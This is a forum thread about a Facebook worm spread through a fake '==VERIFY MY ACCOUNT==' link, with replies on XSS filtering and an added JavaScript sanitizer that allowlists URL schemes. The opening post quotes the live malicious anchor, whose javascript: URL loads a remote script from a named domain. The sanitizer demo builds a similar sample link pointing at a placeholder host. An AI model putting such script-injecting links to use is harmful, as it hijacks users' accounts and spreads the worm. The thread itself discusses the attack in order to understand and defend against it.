

Facebook's ==VERIFY MY ACCOUNT== virus - ricefield

So I don't know much about security, and I don't know how widespread this is, but right now, I'm getting a bunch of friends posting to my wall something along the lines of:

Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process...

And surprisingly, there is a link, right next to Like and Comment that says == VERIFY MY ACCOUNT == ...very authentic looking.

The "verify my account" link executes this bit of javascript:

`<a href="javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();">==VERIFY MY ACCOUNT==</a>`

which as you can see, executes this script: http://pelorak.info/verify.js

I don't know much about how this works, but is there anyone who can shed light on how this works and why it works?
======
nodesocket
We are really surprised Facebook hasn't been hit with this before; how do they
allow remote JavaScript execution? This should be easy to detect. Here
is the JavaScript that is executed: <http://plucketenhe.info/verify.js>

The domain (plucketenhe.info) resolves to: 173.239.26.21, and whois on that
IP: <http://www.ip-adress.com/whois/173.239.26.21>

~~~
ricefield
So in other words, Facebook is kind of dumb for allowing remote JavaScript
execution...

~~~
nodesocket
Well, it can be tricky; oftentimes the XSS attack is masked quite deeply, but
there are known methods. PHP `strip_tags` will assist, though it would need to be
beefed up a bit to handle the onclick, onhover, onblur, onfocus, etc. events.
In this particular case, simply looking for `javascript:` would have done the
trick.
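An added example, not code from the thread or from Facebook, covering both the original question (why the link runs code: a browser treats a `javascript:` URL in `href` as script to execute when the link is clicked) and nodesocket's point about filtering. It allowlists URL schemes on anchors and drops `on*` event-handler attributes, which is the defender's side of the problem. It also shows why a check for the literal string `javascript:` is not enough: browsers ignore case, strip tabs and newlines inside the scheme, and decode HTML entities before parsing the URL, so the check normalizes the same way. The sample HTML, the `evil.example` host and all function names are constructed for this example.

```javascript
// Added example: allowlist-based href checking plus event-handler stripping
// for <a> tags. Names, sample input and the evil.example host are constructed.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Guard String.fromCodePoint against out-of-range entities such as &#99999999;
function fromCode(n) {
  return n <= 0x10ffff ? String.fromCodePoint(n) : "\ufffd";
}

// Simplified HTML entity decoding for the forms an attacker uses to hide a
// scheme, e.g. "&#106;avascript:" or "java&Tab;script:". &amp; is decoded
// last so that "&amp;#106;" is not decoded twice.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCode(parseInt(d, 10)))
    .replace(/&tab;/gi, "\t")
    .replace(/&newline;/gi, "\n")
    .replace(/&colon;/gi, ":")
    .replace(/&amp;/gi, "&");
}

// Mirror what browsers do before scheme parsing: strip leading/trailing
// control characters and spaces, remove tabs/newlines anywhere, ignore case.
function normalizeUrl(raw) {
  return decodeEntities(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "")
    .toLowerCase();
}

// Scheme with its trailing colon, or "" for relative URLs ("/x", "#top", "//h").
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.\-]*):/.exec(url);
  return m ? m[1] + ":" : "";
}

// Relative URLs and allowlisted schemes pass; javascript:, data:, etc. fail.
function isSafeHref(raw) {
  const scheme = schemeOf(normalizeUrl(raw));
  return scheme === "" || ALLOWED_SCHEMES.has(scheme);
}

// name, then optionally = "value" | 'value' | bare-value
const ATTR_RE = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

// Rebuild one <a ...> opening tag keeping only safe attributes.
function sanitizeAnchorTag(tag) {
  const inner = tag.slice(2, -1); // drop "<a" and ">"
  const kept = [];
  for (const m of inner.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    if (name.startsWith("on")) continue;                 // onclick, onmouseover, ...
    if (name === "href" && !isSafeHref(value)) continue; // javascript:, data:, ...
    kept.push(`${name}="${value.replace(/"/g, "&quot;")}"`);
  }
  return kept.length ? `<a ${kept.join(" ")}>` : "<a>";
}

// Apply to every <a> opening tag in a fragment (demo only: a regex tag scan
// breaks on ">" inside quoted attribute values; use a real HTML parser in
// production).
function sanitizeAnchors(html) {
  return html.replace(/<a\b[^>]*>/gi, sanitizeAnchorTag);
}

// Constructed sample shaped like the post's link, with a placeholder host.
const SAMPLE_POST =
  '<a href="javascript:(function(){s=document.createElement(\'script\');' +
  's.src=\'http://evil.example/verify.js\';document.head.appendChild(s);})();"' +
  ' onclick="alert(1)">==VERIFY MY ACCOUNT==</a>';

console.log(sanitizeAnchors(SAMPLE_POST)); // <a>==VERIFY MY ACCOUNT==</a>
```

The scheme allowlist is the check to keep; a denylist of bad schemes has to chase every spelling a browser accepts, whereas "http, https, mailto, or relative" is short and stable.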

